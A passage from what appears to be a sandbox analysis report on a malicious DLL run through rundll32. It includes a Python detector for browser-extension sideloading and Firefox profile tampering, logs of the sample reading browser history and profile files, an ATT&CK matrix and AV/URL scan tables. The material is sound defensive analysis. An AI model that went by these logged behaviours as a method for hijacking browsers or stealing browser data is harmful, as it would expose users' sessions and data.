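    def add(rule, proc, detail):
        f = Finding(rule, proc, detail)
        if f not in seen:          # 110 per-locale drops collapse to one finding per extension
            seen.add(f)
            findings.append(f)

    for line in text.splitlines():
        ev = parse_event(line)
        if ev is None:
            continue
        proc, action, target = ev
        if action in ("file created", "file written"):
            m = CHROME_EXT_RE.search(target)
            if m and proc not in CHROME_OWNERS:
                add("chrome_extension_sideload", proc, f"{m['ext_id']} {m['version']}")
            m = FIREFOX_PROFILE_RE.search(target)
            if m and proc not in FIREFOX_OWNERS and m["file"].lower().startswith(FIREFOX_SENSITIVE):
                add("firefox_profile_tamper", proc, f"{m['profile']}\\{m['file']}")
        elif action == "thread delayed":
            m = re.search(r"delay time:\s*(\d+)", target)
            if m and int(m.group(1)) >= DELAY_THRESHOLD_MS:
                add("long_sleep", proc, f"{int(m.group(1)) // 1000}s")
    return findings


def summarize(findings):
    """Count findings per rule."""
    return dict(Counter(f.rule for f in findings))


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.process}: {f.detail}")
```

Feed it a text export of the behaviour table. Every hit names the writing process, and that is the point: chrome.exe and firefox.exe are the only legitimate writers of these paths, so rundll32.exe appearing there is an indicator on its own. The deduplication matters in practice because a sideloaded extension produces one file-creation event per locale file, as the 110 entries above show, while a single finding per extension id and version is all an analyst needs.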

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addonStartup.json.lz4Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js_tempHROxPCJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js_tempHROxPCJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addonStartup.json.lz4Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js_tempbXaqbVJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js_tempbXaqbVJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqliteJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior

Stealing of Sensitive Information

Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCachevXKGn\urlCache-current.bin
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCachevXKGn
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journal
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pingsBksRb
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js_tempHROxPC
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\compatibility.ini
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCachevXKGn\urlCache.bin
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pingsBksRb\45e26519-596d-41a5-b290-e547b44111fd
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCachevXKGn\scriptCache-current.bin
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCachevXKGn\startupCache.8.little
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCachevXKGn\webext.sc.lz4
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addonStartup.json.lz4
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCachevXKGn\scriptCache-child-current.bin
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pingsBksRb\7278f154-e8f4-4235-84c5-c5c1c6af0084
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pingsBksRb\6fc53411-ad83-4cf6-a5f6-905f0f3f52e8
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js_tempbXaqbV
MITRE ATT&CK Matrix (a leading number is the count of matched signatures for that technique)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 Browser Extensions | 11 Process Injection | 13 Masquerading | 1 OS Credential Dumping | 1 Security Software Discovery | Remote Services | 11 Browser Session Hijacking | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Rundll32 | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Data from Local System | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Virtualization/Sandbox Evasion | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 12 System Information Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Source | Detection | Scanner | Label
GqjUrFW.dll | 39% | Virustotal |
GqjUrFW.dll | 100% | Avira | HEUR/AGEN.1300641
GqjUrFW.dll | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER% | 0% | URL Reputation | safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417. | 0% | URL Reputation | safe
https://merino.services.mozilla.com/api/v1/suggest | 0% | URL Reputation | safe
https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect | 0% | URL Reputation | safe
https://screenshots.firefox.com | 0% | URL Reputation | safe
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report | 0% | URL Reputation | safe
https://ads.stickyadstv.com/firefox-etp | 0% | URL Reputation | safe
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab | 0% | URL Reputation | safe
https://monitor.firefox.com/breach-details/ | 0% | URL Reputation | safe
https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM | 0% | URL Reputation | safe
https://tracking-protection-issues.herokuapp.com/new | 0% | URL Reputation | safe
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report | 0% | URL Reputation | safe
https://chromium.googlesource.com/chromium/src/ | 0% | URL Reputation | safe
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report | 0% | URL Reputation | safe
https://drive-daily-2.corp.google.com/ | 0% | URL Reputation | safe
https://fpn.firefox.com | 0% | URL Reputation | safe
https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections | 0% | URL Reputation | safe
https://schema.org | 0% | URL Reputation | safe
https://drive-daily-1.corp.google.com/ | 0% | URL Reputation | safe
https://drive-daily-5.corp.google.com/ | 0% | URL Reputation | safe
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield | 0% | URL Reputation | safe
https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152 | 0% | URL Reputation | safe
https://mitmdetection.services.mozilla.com/ | 0% | URL Reputation | safe
https://static.adsafeprotected.com/firefox-etp-js | 0% | URL Reputation | safe
https://drive-preprod.corp.google.com/ | 0% | URL Reputation | safe
https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE% | 0% | URL Reputation | safe
https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f | 0% | URL Reputation | safe
https://monitor.firefox.com/user/breach-stats?includeResolved=true | 0% | URL Reputation | safe
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report | 0% | URL Reputation | safe
https://monitor.firefox.com/user/dashboard | 0% | URL Reputation | safe
https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID | 0% | URL Reputation | safe
https://monitor.firefox.com/about | 0% | URL Reputation | safe
http://schema.org | 0% | URL Reputation | safe
https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox- | 0% | Avira URL Cloud | safe
https://coverage.mozilla.org | 0% | URL Reputation | safe
https://searchfox.org/mozilla-central/rev/f40d29a11f2eb4685256b59934e637012ea6fb78/gfx/cairo/cairo/s | 0% | Avira URL Cloud | safe
https://bugzilla.mozilla.org/show_bug.cgi?id=1674587 | 0% | Avira URL Cloud | safe
https://bugzilla.mozilla.org/show_bug.cgi?id=1181126 | 0% | Avira URL Cloud | safe
https://bugzilla.mozilla.org/show_bug.cgi?id=1250907 | 0% | Avira URL Cloud | safe
https://stackoverflow.com/a/32724723. | 0% | Avira URL Cloud | safe
https://clients85.google.com/service/update2/crx | 0% | Avira URL Cloud | safe
https://bugzilla.mozilla.org/show_bug.cgi?id=1289808 | 0% | Avira URL Cloud | safe
https://bugzilla.mozilla.org/show_bug.cgi?id=1250907 | 0% | Virustotal |
https://bugzilla.mozilla.org/show_bug.cgi?id=1674587 | 0% | Virustotal |
https://searchfox.org/mozilla-central/rev/f40d29a11f2eb4685256b59934e637012ea6fb78/gfx/cairo/cairo/s | 0% | Virustotal |
https://bugzilla.mozilla.org/show_bug.cgi?id=1145157 | 0% | Avira URL Cloud | safe
https://stackoverflow.com/a/32724723. | 0% | Virustotal |
https://bugzilla.mozilla.org/show_bug.cgi?id=1425166 | 0% | Avira URL Cloud | safe
https://docs.google.com/ | 0% | Avira URL Cloud | safe
https://bugzilla.mozilla.org/show_bug.cgi?id=1289808 | 0% | Virustotal |
https://bugzilla.mozilla.org/show_bug.cgi?id=1315199 | 0% | Avira URL Cloud | safe
https://bugzilla.mozilla.org/show_bug.cgi?id=1145157 | 0% | Virustotal |
https://bugzilla.mozilla.org/show_bug.cgi?id=1425166 | 0% | Virustotal |
https://bugzilla.mozilla.org/show_bug.cgi?id=1375006 | 0% | Avira URL Cloud | safe
https://bugzilla.mozilla.org/show_bug.cgi?id=1181126 | 0% | Virustotal |
https://bugzilla.mozilla.org/show_bug.cgi?id=1724254 | 0% | Avira URL Cloud | safe
https://bugzilla.mozilla.org/show_bug.cgi?id=1414039 | 0% | Avira URL Cloud | safe
https://bugzilla.mozilla.org/show_bug.cgi?id=1315199 | 0% | Virustotal |
https://html.spec.whatwg.org/multipage/microdata.html#values | 0% | Avira URL Cloud | safe
https://www.google.com/?h=tyjjeh2ogi3qqdrbygpj96fo04sd8rncm8xt.gg4fdx0u7lease | 0% | Avira URL Cloud | safe
https://docs.google.com/ | 0% | Virustotal |
https://bugzilla.mozilla.org/show_bug.cgi?id=1724254 | 0% | Virustotal |
https://www.amazon.com/exec/obidos/external-search/ | 0% | Avira URL Cloud | safe
http://certs.godaddy.com/repository/ | 0% | Avira URL Cloud | safe
http://certificates.starfieldtech.com/repository | 0% | Avira URL Cloud | safe
https://html.spec.whatwg.org/multipage/microdata.html#values | 0% | Virustotal |
https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox- | 0% | Virustotal |
https://www.amazon.com/exec/obidos/external-search/ | 0% | Virustotal |
https://bugzilla.mozilla.org/show_bug.cgi?id=1343305 | 0% | Avira URL Cloud | safe
https://bugzilla.mozilla.org/show_bug.cgi?id=1375006 | 0% | Virustotal |
https://bugzilla.mozilla.org/show_bug.cgi?id=1429636 | 0% | Avira URL Cloud | safe
https://search.avast.com/AV752/ | 0% | Avira URL Cloud | safe
https://bugzilla.mozilla.org/show_bug.cgi?id=1691227 | 0% | Avira URL Cloud | safe
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94 | 0% | Avira URL Cloud | safe
https://bugzilla.mozilla.org/show_bug.cgi?id=1343305 | 0% | Virustotal |
https://bugzilla.mozilla.org/show_bug.cgi?id=1205651 | 0% | Avira URL Cloud | safe
https://search.avast.com/AV752/ | 0% | Virustotal |
https://bugzilla.mozilla.org/show_bug.cgi?id=1414039 | 0% | Virustotal |
https://www.google.com/?h=bq2w5i6ru5np2fu3rd3eltwiyje2l6w8844g.mq7doifak | 0% | Avira URL Cloud | safe
http://certs.godaddy.com/repository/ | 0% | Virustotal |
https://bugzilla.mozilla.org/show_bug.cgi?id=1691227 | 0% | Virustotal |
https://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
https://chrome.google.com/webstore | 0% | Avira URL Cloud | safe
https://payments.google.com/payments/v4/js/integrator.js | 0% | Avira URL Cloud | safe
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta | 0% | Avira URL Cloud | safe
https://duckduckgo.com/?q= | 0% | Virustotal |
https://bugzilla.mozilla.org/show_bug.cgi?id=1429636 | 0% | Virustotal |
https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes | 0% | Avira URL Cloud | safe
https://github.com/mozilla/gcp-ingestion/blob/master/docs/edge.md#postput-request | 0% | Avira URL Cloud | safe
https://payments.google.com/payments/v4/js/integrator.js | 0% | Virustotal |
http://certificates.starfieldtech.com/repository | 0% | Virustotal |
https://groups.google.com/forum/# | 0% | Avira URL Cloud | safe
https://bugzilla.mozilla.org/show_bug.cgi?id=1709666 | 0% | Avira URL Cloud | safe
https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes | 0% | Virustotal |
https://chrome.google.com/webstore | 0% | Virustotal |
https://bugzilla.mozilla.org/show_bug.cgi?id=1433118 | 0% | Avira URL Cloud | safe
https://bugzilla.mozilla.org/show_bug.cgi?id=1205651 | 0% | Virustotal |
https://bugzilla.mozilla.org/show_bug.cgi?id=1437038 | 0% | Avira URL Cloud | safe
https://www.maps.google.com/a/place | 0% | Avira URL Cloud | safe
https://github.com/mozilla/gcp-ingestion/blob/master/docs/edge.md#postput-request | 0% | Virustotal |
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://bugzilla.mozilla.org/show_bug.cgi?id=1674587omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://searchfox.org/mozilla-central/rev/f40d29a11f2eb4685256b59934e637012ea6fb78/gfx/cairo/cairo/somni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1250907omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1181126omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://stackoverflow.com/a/32724723.omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://clients85.google.com/service/update2/crxmanifest.json.3.drfalse
  • Avira URL Cloud: safe
unknown
https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%omni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.prefs.js_tempHROxPC.3.drfalse
  • URL Reputation: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1289808omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://merino.services.mozilla.com/api/v1/suggestomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1145157omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protectomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1425166omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://docs.google.com/rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1315199omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://screenshots.firefox.comomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1375006omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1724254omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-reportomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://ads.stickyadstv.com/firefox-etprundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691390596.0000000003394000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747461262.000000000339B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691435396.000000000339A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691413102.00000000033A5000.00000004.00000020.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tabomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1414039omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://monitor.firefox.com/breach-details/omni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEMomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://html.spec.whatwg.org/multipage/microdata.html#valuesomni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://www.google.com/?h=tyjjeh2ogi3qqdrbygpj96fo04sd8rncm8xt.gg4fdx0u7leaserundll32.exe, 00000004.00000003.1742442383.0000000002CE7000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://www.amazon.com/exec/obidos/external-search/rundll32.exe, 00000003.00000003.1666646738.0000000005043000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1668735841.0000000002A7C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1667800987.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662092513.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662204025.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662183688.0000000002CAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662076222.0000000002CC5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662227982.0000000002CB5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://certs.godaddy.com/repository/omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://certificates.starfieldtech.com/repositoryomni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1343305omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1429636omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://search.avast.com/AV752/omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://tracking-protection-issues.herokuapp.com/newomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-reportomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1691227omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94prefs.js_tempHROxPC.3.drfalse
  • Avira URL Cloud: safe
unknown
https://chromium.googlesource.com/chromium/src/omni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1205651omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
